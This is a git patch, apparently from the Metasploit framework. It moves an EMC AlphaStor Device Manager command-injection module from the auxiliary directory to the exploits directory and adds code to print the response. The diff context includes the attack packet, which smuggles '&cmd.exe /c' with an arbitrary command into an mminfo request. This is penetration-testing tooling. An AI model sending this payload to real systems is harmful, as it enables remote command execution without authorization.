From d4a8b7e00daa941434eedbd31dfcb12184afa9c1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 5 Sep 2014 10:38:28 -0500 Subject: [PATCH] Move to exploits --- .../windows/emc/alphastor_device_manager_exec.rb} | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) rename modules/{auxiliary/admin/emc/alphastor_devicemanager_75_injection.rb => exploits/windows/emc/alphastor_device_manager_exec.rb} (93%) diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_75_injection.rb b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb similarity index 93% rename from modules/auxiliary/admin/emc/alphastor_devicemanager_75_injection.rb rename to modules/exploits/windows/emc/alphastor_device_manager_exec.rb index 0c56037b1f..e99a2b8e89 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_75_injection.rb +++ b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Auxiliary def run connect - padding = Rex::Text.rand_text_alpha_upper(512) packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}" @@ -46,6 +45,11 @@ class Metasploit3 < Msf::Auxiliary sock.put(packet) + res = sock.get_once + if res + print_status("#{Rex::Text.to_hex_dump(res)}") + end + disconnect end